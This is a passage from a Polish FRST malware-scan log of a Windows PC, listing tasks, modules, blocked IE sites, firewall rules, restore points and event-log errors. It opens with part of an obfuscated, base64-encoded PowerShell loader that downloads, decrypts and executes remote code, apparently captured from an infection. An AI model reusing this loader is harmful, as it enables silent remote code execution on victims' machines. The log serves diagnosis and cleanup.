wAKQApADsAfQAKAGYAdQBuAGMAdABpAG8AbgAgAGQAcwB0AHIAKAAkAHIAYQB3AGQAYQB0AGEAKQB7ACQAYgB0AD0AWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHIAYQB3AGQAYQB0AGEAKQA7ACQAZQB4AHQAPQAkAGIAdABbADAAXQA7ACQAawBlAHkAPQAkAGIAdABbADEAXQAgAC0AYgB4AG8AcgAgADEANwAwADsAZgBvAHIAKAAkAGkAPQAyADsAJABpACAALQBsAHQAIAAkAGIAdAAuAEwAZQBuAGcAdABoADsAJABpACsAKwApAHsAJABiAHQAWwAkAGkAXQA9ACgAJABiAHQAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACgAKAAkAGsAZQB5ACAAKwAgACQAaQApACAALQBiAGEAbgBkACAAMgA1ADUAKQApADsAfQAKAHIAZQB0AHUAcgBuACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEQAZQBmAGwAYQB0AGUAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACQAYgB0ACwAMgAsACgAJABiAHQALgBMAGUAbgBnAHQAaAAtACQAZQB4AHQAKQApACkALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwB9AAoAJABzAGMAPQBkAHMAdAByACgAdwBjACgAJABzAHUAcgBsACkAKQA7AEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgAC0AYwBvAG0AbQBhAG4AZAAgACIAJABzAGMAIgA7AH0AYwBhAHQAYwBoAHsAfQA7AGUAeABpAHQAIAAwADsA (Załączenie wejścia w fixlist spowoduje przesunięcie pliku zadania (.job). Plik uruchamiany docelowo przez zadanie nie zostanie przeniesiony.) Task: C:\Windows\Tasks\Adobe Flash Player PPAPI Notifier.job => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_20_0_0_228_pepper.exe Task: C:\Windows\Tasks\GlaryInitialize 3.job => C:\Program Files (x86)\Glary Utilities 3\Initialize.exe Task: C:\Windows\Tasks\GlaryUpdate 3.job => C:\Program Files (x86)\Glary Utilities 3\CheckUpdate.exe ==================== Skróty ============================= (Wybrane wejścia mogą zostać załączone w celu ich zresetowania lub usunięcia.) ==================== Załadowane moduły (filtrowane) ============== 2013-05-27 07:24 - 2013-05-12 21:34 - 00087328 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll 2013-05-31 10:07 - 2007-02-13 15:20 - 00253008 _____ () C:\Windows\adirasx64.exe 2013-06-05 08:11 - 2013-06-05 08:11 - 00080160 _____ () C:\Program Files (x86)\Glary Utilities 3\zlib1.dll 2015-12-10 16:06 - 2015-12-10 16:06 - 61547128 _____ () C:\Program Files (x86)\Opera\34.0.2036.25\opera.dll 2015-12-10 16:06 - 2015-12-10 16:06 - 01983096 _____ () C:\Program Files (x86)\Opera\34.0.2036.25\libglesv2.dll 2015-12-10 16:06 - 2015-12-10 16:06 - 00081528 _____ () C:\Program Files (x86)\Opera\34.0.2036.25\libegl.dll 2015-12-11 12:05 - 2015-12-11 12:05 - 16573120 _____ () C:\Windows\SysWOW64\Macromed\Flash\pepflashplayer32_20_0_0_228.dll ==================== Alternate Data Streams (filtrowane) ========= (Załączenie wejścia w fixlist spowoduje usunięcie strumienia ADS.) ==================== Tryb awaryjny (filtrowane) =================== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Wartość "AlternateShell" zostanie przywrócona.) ==================== EXE - Powiązania (filtrowane) =============== (Załączenie wejścia w fixlist spowoduje usunięcie obiektu z rejestru lub przywrócenie jego domyślnej postaci.) ==================== Internet Explorer - Witryny zaufane i z ograniczeniami =============== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru.) IE trusted site: HKU\.DEFAULT\...\clonewarsadventures.com -> clonewarsadventures.com IE trusted site: HKU\.DEFAULT\...\freerealms.com -> freerealms.com IE trusted site: HKU\.DEFAULT\...\soe.com -> soe.com IE trusted site: HKU\.DEFAULT\...\sony.com -> sony.com IE restricted site: HKU\.DEFAULT\...\007guard.com -> install.007guard.com IE restricted site: HKU\.DEFAULT\...\008i.com -> 008i.com IE restricted site: HKU\.DEFAULT\...\008k.com -> www.008k.com IE restricted site: HKU\.DEFAULT\...\00hq.com -> www.00hq.com IE restricted site: HKU\.DEFAULT\...\010402.com -> 010402.com IE restricted site: HKU\.DEFAULT\...\032439.com -> 80gw6ry3i3x3qbrkwhxhw.032439.com IE restricted site: HKU\.DEFAULT\...\0scan.com -> www.0scan.com IE restricted site: HKU\.DEFAULT\...\1-2005-search.com -> www.1-2005-search.com IE restricted site: HKU\.DEFAULT\...\1-domains-registrations.com -> www.1-domains-registrations.com IE restricted site: HKU\.DEFAULT\...\1000gratisproben.com -> www.1000gratisproben.com IE restricted site: HKU\.DEFAULT\...\1001namen.com -> www.1001namen.com IE restricted site: HKU\.DEFAULT\...\100888290cs.com -> mir.100888290cs.com IE restricted site: HKU\.DEFAULT\...\100sexlinks.com -> www.100sexlinks.com IE restricted site: HKU\.DEFAULT\...\10sek.com -> www.10sek.com IE restricted site: HKU\.DEFAULT\...\12-26.net -> user1.12-26.net IE restricted site: HKU\.DEFAULT\...\12-27.net -> user1.12-27.net IE restricted site: HKU\.DEFAULT\...\123fporn.info -> www.123fporn.info IE restricted site: HKU\.DEFAULT\...\123haustiereundmehr.com -> www.123haustiereundmehr.com IE restricted site: HKU\.DEFAULT\...\123moviedownload.com -> www.123moviedownload.com IE restricted site: HKU\.DEFAULT\...\123simsen.com -> www.123simsen.com Wykryto więcej niż wyliczono: 7864 witryn. IE trusted site: HKU\S-1-5-19\...\clonewarsadventures.com -> clonewarsadventures.com IE trusted site: HKU\S-1-5-19\...\freerealms.com -> freerealms.com IE trusted site: HKU\S-1-5-19\...\soe.com -> soe.com IE trusted site: HKU\S-1-5-19\...\sony.com -> sony.com IE trusted site: HKU\S-1-5-20\...\clonewarsadventures.com -> clonewarsadventures.com IE trusted site: HKU\S-1-5-20\...\freerealms.com -> freerealms.com IE trusted site: HKU\S-1-5-20\...\soe.com -> soe.com IE trusted site: HKU\S-1-5-20\...\sony.com -> sony.com IE trusted site: HKU\S-1-5-21-1688851452-3417616463-1083969991-1000\...\clonewarsadventures.com -> clonewarsadventures.com IE trusted site: HKU\S-1-5-21-1688851452-3417616463-1083969991-1000\...\freerealms.com -> freerealms.com IE trusted site: HKU\S-1-5-21-1688851452-3417616463-1083969991-1000\...\soe.com -> soe.com IE trusted site: HKU\S-1-5-21-1688851452-3417616463-1083969991-1000\...\sony.com -> sony.com IE restricted site: HKU\S-1-5-21-1688851452-3417616463-1083969991-1000\...\007guard.com -> install.007guard.com IE restricted site: HKU\S-1-5-21-1688851452-3417616463-1083969991-1000\...\008i.com -> 008i.com IE restricted site: HKU\S-1-5-21-1688851452-3417616463-1083969991-1000\...\008k.com -> www.008k.com IE restricted site: HKU\S-1-5-21-1688851452-3417616463-1083969991-1000\...\00hq.com -> www.00hq.com IE restricted site: HKU\S-1-5-21-1688851452-3417616463-1083969991-1000\...\010402.com -> 010402.com IE restricted site: HKU\S-1-5-21-1688851452-3417616463-1083969991-1000\...\032439.com -> 80gw6ry3i3x3qbrkwhxhw.032439.com IE restricted site: HKU\S-1-5-21-1688851452-3417616463-1083969991-1000\...\0scan.com -> www.0scan.com IE restricted site: HKU\S-1-5-21-1688851452-3417616463-1083969991-1000\...\1-2005-search.com -> www.1-2005-search.com IE restricted site: HKU\S-1-5-21-1688851452-3417616463-1083969991-1000\...\1-domains-registrations.com -> www.1-domains-registrations.com IE restricted site: HKU\S-1-5-21-1688851452-3417616463-1083969991-1000\...\1000gratisproben.com -> www.1000gratisproben.com IE restricted site: HKU\S-1-5-21-1688851452-3417616463-1083969991-1000\...\1001namen.com -> www.1001namen.com IE restricted site: HKU\S-1-5-21-1688851452-3417616463-1083969991-1000\...\100888290cs.com -> mir.100888290cs.com IE restricted site: HKU\S-1-5-21-1688851452-3417616463-1083969991-1000\...\100sexlinks.com -> www.100sexlinks.com IE restricted site: HKU\S-1-5-21-1688851452-3417616463-1083969991-1000\...\10sek.com -> www.10sek.com IE restricted site: HKU\S-1-5-21-1688851452-3417616463-1083969991-1000\...\12-26.net -> user1.12-26.net IE restricted site: HKU\S-1-5-21-1688851452-3417616463-1083969991-1000\...\12-27.net -> user1.12-27.net IE restricted site: HKU\S-1-5-21-1688851452-3417616463-1083969991-1000\...\123fporn.info -> www.123fporn.info IE restricted site: HKU\S-1-5-21-1688851452-3417616463-1083969991-1000\...\123haustiereundmehr.com -> www.123haustiereundmehr.com IE restricted site: HKU\S-1-5-21-1688851452-3417616463-1083969991-1000\...\123moviedownload.com -> www.123moviedownload.com IE restricted site: HKU\S-1-5-21-1688851452-3417616463-1083969991-1000\...\123simsen.com -> www.123simsen.com Wykryto więcej niż wyliczono: 7864 witryn. IE trusted site: HKU\S-1-5-21-1688851452-3417616463-1083969991-1003\...\clonewarsadventures.com -> clonewarsadventures.com IE trusted site: HKU\S-1-5-21-1688851452-3417616463-1083969991-1003\...\freerealms.com -> freerealms.com IE trusted site: HKU\S-1-5-21-1688851452-3417616463-1083969991-1003\...\soe.com -> soe.com IE trusted site: HKU\S-1-5-21-1688851452-3417616463-1083969991-1003\...\sony.com -> sony.com IE restricted site: HKU\S-1-5-21-1688851452-3417616463-1083969991-1003\...\007guard.com -> install.007guard.com IE restricted site: HKU\S-1-5-21-1688851452-3417616463-1083969991-1003\...\008i.com -> 008i.com IE restricted site: HKU\S-1-5-21-1688851452-3417616463-1083969991-1003\...\008k.com -> www.008k.com IE restricted site: HKU\S-1-5-21-1688851452-3417616463-1083969991-1003\...\00hq.com -> www.00hq.com IE restricted site: HKU\S-1-5-21-1688851452-3417616463-1083969991-1003\...\010402.com -> 010402.com IE restricted site: HKU\S-1-5-21-1688851452-3417616463-1083969991-1003\...\032439.com -> 80gw6ry3i3x3qbrkwhxhw.032439.com IE restricted site: HKU\S-1-5-21-1688851452-3417616463-1083969991-1003\...\0scan.com -> www.0scan.com IE restricted site: HKU\S-1-5-21-1688851452-3417616463-1083969991-1003\...\1-2005-search.com -> www.1-2005-search.com IE restricted site: HKU\S-1-5-21-1688851452-3417616463-1083969991-1003\...\1-domains-registrations.com -> www.1-domains-registrations.com IE restricted site: HKU\S-1-5-21-1688851452-3417616463-1083969991-1003\...\1000gratisproben.com -> www.1000gratisproben.com IE restricted site: HKU\S-1-5-21-1688851452-3417616463-1083969991-1003\...\1001namen.com -> www.1001namen.com IE restricted site: HKU\S-1-5-21-1688851452-3417616463-1083969991-1003\...\100888290cs.com -> mir.100888290cs.com IE restricted site: HKU\S-1-5-21-1688851452-3417616463-1083969991-1003\...\100sexlinks.com -> www.100sexlinks.com IE restricted site: HKU\S-1-5-21-1688851452-3417616463-1083969991-1003\...\10sek.com -> www.10sek.com IE restricted site: HKU\S-1-5-21-1688851452-3417616463-1083969991-1003\...\12-26.net -> user1.12-26.net IE restricted site: HKU\S-1-5-21-1688851452-3417616463-1083969991-1003\...\12-27.net -> user1.12-27.net IE restricted site: HKU\S-1-5-21-1688851452-3417616463-1083969991-1003\...\123fporn.info -> www.123fporn.info IE restricted site: HKU\S-1-5-21-1688851452-3417616463-1083969991-1003\...\123haustiereundmehr.com -> www.123haustiereundmehr.com IE restricted site: HKU\S-1-5-21-1688851452-3417616463-1083969991-1003\...\123moviedownload.com -> www.123moviedownload.com IE restricted site: HKU\S-1-5-21-1688851452-3417616463-1083969991-1003\...\123simsen.com -> www.123simsen.com Wykryto więcej niż wyliczono: 7864 witryn. ==================== Hosts - zawartość: =============================== (Użycie dyrektywy Hosts: w fixlist spowoduje reset pliku Hosts.) 2009-07-14 03:34 - 2016-01-05 20:10 - 00000035 ____A C:\Windows\system32\Drivers\etc\hosts ==================== Inne obszary ============================ (Obecnie brak automatycznej naprawy dla tej sekcji.) HKU\S-1-5-21-1688851452-3417616463-1083969991-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Piotrek\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg DNS Servers: 192.168.1.254 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 0) Zapora systemu Windows [funkcja włączona] ==================== MSCONFIG/TASK MANAGER - Wyłączone elementy == (Obecnie brak automatycznej naprawy dla tej sekcji.) ==================== Reguły Zapory systemu Windows (filtrowane) =============== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) FirewallRules: [{16B6CBA8-C16E-43FF-B953-A3F74674D42D}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe FirewallRules: [{67FF29AE-A609-4588-8031-975E93055105}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe FirewallRules: [TCP Query User{097C468C-2E2A-41A8-94DB-F5215828B5A0}C:\program files (x86)\winamp\winamp.exe] => (Allow) C:\program files (x86)\winamp\winamp.exe FirewallRules: [UDP Query User{1F897A2C-8EAF-4D6D-9167-0DB40F735262}C:\program files (x86)\winamp\winamp.exe] => (Allow) C:\program files (x86)\winamp\winamp.exe FirewallRules: [{2664EF01-41F1-40E3-BB43-86224AB4175A}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe FirewallRules: [{B4ACA0AF-999C-4613-8628-A342FFE5A22C}] => (Allow) LPort=2869 FirewallRules: [{AA3498F5-DBA0-420B-9FD5-7D800F7887D8}] => (Allow) LPort=1900 FirewallRules: [{34FD2066-5055-4948-B41D-8AFBE308F34A}] => (Allow) C:\Program Files (x86)\Nero\KM\KwikMedia.exe FirewallRules: [{F365FE2B-1AEC-47D7-9D9F-431F787F88B2}] => (Allow) C:\Program Files (x86)\Nero\KM\KwikMedia.exe FirewallRules: [TCP Query User{EFBA51AB-5E24-458B-A65C-0E24B0A33072}C:\program files (x86)\winamp\winamp.exe] => (Allow) C:\program files (x86)\winamp\winamp.exe FirewallRules: [UDP Query User{A618445D-5650-4AEC-B0D9-CF88D6560096}C:\program files (x86)\winamp\winamp.exe] => (Allow) C:\program files (x86)\winamp\winamp.exe FirewallRules: [{2F0DEA41-C86C-44F5-B5D7-9D9CE4DD69B3}] => (Allow) C:\Users\Piotrek\AppData\Roaming\Spotify\spotify.exe FirewallRules: [{F6DF25ED-5E53-4FBB-83FE-D799D192745E}] => (Allow) C:\Users\Piotrek\AppData\Roaming\Spotify\spotify.exe FirewallRules: [{AA1085DA-F0E9-4C1B-824C-DE8A603A6C4A}] => (Allow) C:\Users\Piotrek\AppData\Roaming\Spotify\spotify.exe FirewallRules: [{4DE6413A-D380-4E40-AF4A-DECE693A2AB5}] => (Allow) C:\Users\Piotrek\AppData\Roaming\Spotify\spotify.exe FirewallRules: [{D99FD5C1-7EBF-438A-A0E0-13A0B067F99D}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe FirewallRules: [{4A2F4A16-AB69-41C8-8E40-B472ADF8D520}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe FirewallRules: [TCP Query User{4FC4923F-1109-466B-A54C-5EA9D2C38D22}D:\gry\quake3\quake3e.exe] => (Allow) D:\gry\quake3\quake3e.exe FirewallRules: [UDP Query User{069EA41F-E575-48B9-A292-42A563054D03}D:\gry\quake3\quake3e.exe] => (Allow) D:\gry\quake3\quake3e.exe FirewallRules: [TCP Query User{040400CF-A2FE-4B21-95D6-214D6B71BE74}D:\gry\praetorians\praetorians.exe] => (Allow) D:\gry\praetorians\praetorians.exe FirewallRules: [UDP Query User{5C88D076-29A9-4BB4-A716-75A1041A5984}D:\gry\praetorians\praetorians.exe] => (Allow) D:\gry\praetorians\praetorians.exe FirewallRules: [{FC48E8CC-6224-4287-8A55-53B0FCC7340A}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe FirewallRules: [{2C558C79-3859-4E5F-A8B5-91A9C3211DAC}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe FirewallRules: [{32F05FC0-F4E5-45E0-B3A8-0D5B7807E66E}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe FirewallRules: [{3E586323-B395-43F1-99E0-51DDB92E6CD2}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe FirewallRules: [{81587D38-6D85-4B9C-B770-87CC530A1D17}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{869B0A0D-BAEF-4DAC-ABE9-6330E633742F}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [TCP Query User{27AEE387-C07A-4B10-B705-4175FDD9FF77}C:\windows\syswow64\dplaysvr.exe] => (Allow) C:\windows\syswow64\dplaysvr.exe FirewallRules: [UDP Query User{C4C26D9B-678A-4BF4-B001-3C209EEDD1DD}C:\windows\syswow64\dplaysvr.exe] => (Allow) C:\windows\syswow64\dplaysvr.exe FirewallRules: [TCP Query User{05EE6603-AEA0-4992-BB4D-8EFBDA87E53B}C:\windows\syswow64\dplaysvr.exe] => (Allow) C:\windows\syswow64\dplaysvr.exe FirewallRules: [UDP Query User{F5B19C1F-7EE3-4A2B-84F2-AF275C40DDFA}C:\windows\syswow64\dplaysvr.exe] => (Allow) C:\windows\syswow64\dplaysvr.exe FirewallRules: [{A566D245-8C57-4315-8314-5BDECD6E8855}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Counter-Strike Global Offensive\csgo.exe FirewallRules: [{823AC206-5B21-4063-8C13-0A5F38E49752}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Counter-Strike Global Offensive\csgo.exe FirewallRules: [TCP Query User{FAD194B7-FCFB-4443-94C0-591EEB5C49CE}D:\gry\zamek 2\sc2_v1.0.21397\bin\win32_release\crusader2.exe] => (Allow) D:\gry\zamek 2\sc2_v1.0.21397\bin\win32_release\crusader2.exe FirewallRules: [UDP Query User{E9CDEE5A-221F-4A61-811C-D99B24BB06D9}D:\gry\zamek 2\sc2_v1.0.21397\bin\win32_release\crusader2.exe] => (Allow) D:\gry\zamek 2\sc2_v1.0.21397\bin\win32_release\crusader2.exe FirewallRules: [TCP Query User{96B4F270-A33E-4529-899B-7F9093B4DFF8}D:\gry\zamek 2\sc2_v1.0.21397\bin\win32_release\crusader2.exe] => (Block) D:\gry\zamek 2\sc2_v1.0.21397\bin\win32_release\crusader2.exe FirewallRules: [UDP Query User{A656EB47-AD4E-4A4E-97E6-40BE3E7ACCC7}D:\gry\zamek 2\sc2_v1.0.21397\bin\win32_release\crusader2.exe] => (Block) D:\gry\zamek 2\sc2_v1.0.21397\bin\win32_release\crusader2.exe FirewallRules: [{E7FA263F-934F-4123-9DAD-1D8E3388DDC1}] => (Allow) D:\Gry\BF3\Bejeweled 3\Bejeweled3.exe FirewallRules: [{8240B9FC-5096-4CF6-83C5-35F89ACCA120}] => (Allow) D:\Gry\BF3\Bejeweled 3\Bejeweled3.exe FirewallRules: [{31C2623A-9BD7-4F7F-892C-763ACAD7751A}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Left 4 Dead 2\left4dead2.exe FirewallRules: [{5888F6F9-D256-42D1-B553-3084F904A311}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Left 4 Dead 2\left4dead2.exe FirewallRules: [{A064FC0B-2A22-4670-9C60-78253893C883}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{15B289B6-AD6A-42D1-B479-E4977A6A20DF}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [TCP Query User{DD21A90A-C1F9-469F-86CF-53EF554A81FF}C:\program files\java\jre1.8.0_45\bin\javaw.exe] => (Block) C:\program files\java\jre1.8.0_45\bin\javaw.exe FirewallRules: [UDP Query User{6A2B61F6-68E2-4E67-8431-046CE8AC1D73}C:\program files\java\jre1.8.0_45\bin\javaw.exe] => (Block) C:\program files\java\jre1.8.0_45\bin\javaw.exe FirewallRules: [{A49A5DDE-E05C-4E29-9397-61FA697D4B29}] => (Allow) LPort=53447 FirewallRules: [{C819CBAE-F9AC-4BCB-9D77-8268CC2C7074}] => (Allow) LPort=53447 FirewallRules: [{2611C88C-E6DB-4077-9A50-D4202351BFD4}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Dying Light\DyingLightGame.exe FirewallRules: [{B30C5E24-AEA9-4542-99BC-2C6B879780D9}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Dying Light\DyingLightGame.exe FirewallRules: [{D54790A5-B647-4D40-BC1D-8AC297CBE522}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Dying Light\DevTools\DyingLightPlayer.exe FirewallRules: [{9A19C1AB-4D84-46EA-AAB7-D3D09922D66B}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Dying Light\DevTools\DyingLightPlayer.exe FirewallRules: [{D45CDDA2-68CF-4DB2-8D73-F9C00B4DA66F}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Risen\bin\Risen.exe FirewallRules: [{FF355095-2CD9-4319-B679-3F71E4A09A84}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Risen\bin\Risen.exe FirewallRules: [{F17AE94F-F409-42E8-8374-BE03BCC27963}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\dont_starve\bin\dontstarve_steam.exe FirewallRules: [{59E8EF45-DEF9-4016-8D3D-3A71A09CD00D}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\dont_starve\bin\dontstarve_steam.exe ==================== Punkty Przywracania systemu ========================= 03-01-2016 22:15:25 Punkt przywracania stworzony przez HitmanPro 03-01-2016 22:16:09 Punkt przywracania stworzony przez HitmanPro 03-01-2016 22:41:27 Usunięte Heroes of Might and Magic V - Dzikie Hordy 03-01-2016 22:41:55 Usunięte Heroes of Might and Magic V - Kuźnia Przeznaczenia 03-01-2016 22:42:09 Usunięte Heroes of Might and Magic V ==================== Wadliwe urządzenia w Menedżerze urządzeń ============= Name: Kontroler Uniwersalnej magistrali szeregowej (USB) Description: Kontroler Uniwersalnej magistrali szeregowej (USB) Class Guid: Manufacturer: Service: Problem: : The drivers for this device are not installed. (Code 28) Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard. Name: Kontroler PCI Simple Communications Description: Kontroler PCI Simple Communications Class Guid: Manufacturer: Service: Problem: : The drivers for this device are not installed. (Code 28) Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard. Name: Teredo Tunneling Pseudo-Interface Description: Karta tunelowania Teredo firmy Microsoft Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318} Manufacturer: Microsoft Service: tunnel Problem: : This device cannot start. (Code10) Resolution: Device failed to start. Click "Update Driver" to update the drivers for this device. On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard. ==================== Błędy w Dzienniku zdarzeń: ========================= Dziennik Aplikacja: ================== Error: (01/05/2016 06:59:04 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nazwa aplikacji powodującej błąd: csgo.exe, wersja: 0.0.0.0, sygnatura czasowa: 0x5653d523 Nazwa modułu powodującego błąd: nvd3dum.dll, wersja: 9.18.13.2018, sygnatura czasowa: 0x518fe5d3 Kod wyjątku: 0xc0000005 Przesunięcie błędu: 0x003e9053 Identyfikator procesu powodującego błąd: 0xed8 Godzina uruchomienia aplikacji powodującej błąd: 0xcsgo.exe0 Ścieżka aplikacji powodującej błąd: csgo.exe1 Ścieżka modułu powodującego błąd: csgo.exe2 Identyfikator raportu: csgo.exe3 Error: (01/05/2016 08:43:53 AM) (Source: Office 2013 Licensing Service) (EventID: 0) (User: ) Description: Subscription licensing service failed: -1073418225 Error: (01/04/2016 07:50:36 PM) (Source: SideBySide) (EventID: 80) (User: ) Description: Nie można wygenerować kontekstu aktywacji dla „C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7600.16385_none_fa645303170382f6.manifest1”. Błąd w pliku manifestu lub w pliku zasad „C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7600.16385_none_fa645303170382f6.manifest2” w wierszu C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7600.16385_none_fa645303170382f6.manifest3. Wersja składnika wymagana przez aplikację powoduje konflikt z inną wersją składnika, która jest już aktywna. Składniki powodujące konflikt: Składnik 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7600.16385_none_fa645303170382f6.manifest. Składnik 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7600.16385_none_421189da2b7fabfc.manifest. Error: (01/04/2016 07:50:13 PM) (Source: SideBySide) (EventID: 35) (User: ) Description: Nie można wygenerować kontekstu aktywacji dla "SMC,processorArchitecture="x86",type="win32",version="8.2.0.0"1". Błąd w pliku manifestu lub w pliku zasad "SMC,processorArchitecture="x86",type="win32",version="8.2.0.0"2" w wierszu SMC,processorArchitecture="x86",type="win32",version="8.2.0.0"3. Tożsamość składnika znaleziona w manifeście nie odpowiada tożsamości składnika żądanego. Odwołanie to SMC,processorArchitecture="x86",type="win32",version="8.2.0.0". Definicja to SMC,processorArchitecture="x86",type="win32",version="12.0.0.0". Użyj narzędzia sxstrace.exe, aby uzyskać szczegółową diagnozę. Error: (01/04/2016 07:49:41 PM) (Source: SideBySide) (EventID: 33) (User: ) Description: Nie można wygenerować kontekstu aktywacji dla "Microsoft.VC90.DebugCRT,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="9.0.21022.8"1". Nie można odnaleźć zestawu zależnego Microsoft.VC90.DebugCRT,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="9.0.21022.8". Użyj narzędzia sxstrace.exe, aby uzyskać szczegółową diagnozę. Error: (01/04/2016 07:49:39 PM) (Source: SideBySide) (EventID: 80) (User: ) Description: Nie można wygenerować kontekstu aktywacji dla „C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7600.16385_none_fa645303170382f6.manifest1”. Błąd w pliku manifestu lub w pliku zasad „C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7600.16385_none_fa645303170382f6.manifest2” w wierszu C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7600.16385_none_fa645303170382f6.manifest3. Wersja składnika wymagana przez aplikację powoduje konflikt z inną wersją składnika, która jest już aktywna. Składniki powodujące konflikt: Składnik 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7600.16385_none_fa645303170382f6.manifest. Składnik 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7600.16385_none_421189da2b7fabfc.manifest. Error: (01/04/2016 06:37:03 PM) (Source: SideBySide) (EventID: 80) (User: ) Description: Nie można wygenerować kontekstu aktywacji dla „C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7600.16385_none_fa645303170382f6.manifest1”. Błąd w pliku manifestu lub w pliku zasad „C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7600.16385_none_fa645303170382f6.manifest2” w wierszu C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7600.16385_none_fa645303170382f6.manifest3. Wersja składnika wymagana przez aplikację powoduje konflikt z inną wersją składnika, która jest już aktywna. Składniki powodujące konflikt: Składnik 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7600.16385_none_fa645303170382f6.manifest. Składnik 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7600.16385_none_421189da2b7fabfc.manifest. Error: (01/04/2016 06:19:29 PM) (Source: SideBySide) (EventID: 80) (User: ) Description: Nie można wygenerować kontekstu aktywacji dla „C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7600.16385_none_fa645303170382f6.manifest1”. Błąd w pliku manifestu lub w pliku zasad „C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7600.16385_none_fa645303170382f6.manifest2” w wierszu C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7600.16385_none_fa645303170382f6.manifest3. Wersja składnika wymagana przez aplikację powoduje konflikt z inną wersją składnika, która jest już aktywna. Składniki powodujące konflikt: Składnik 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7600.16385_none_fa645303170382f6.manifest. Składnik 2: 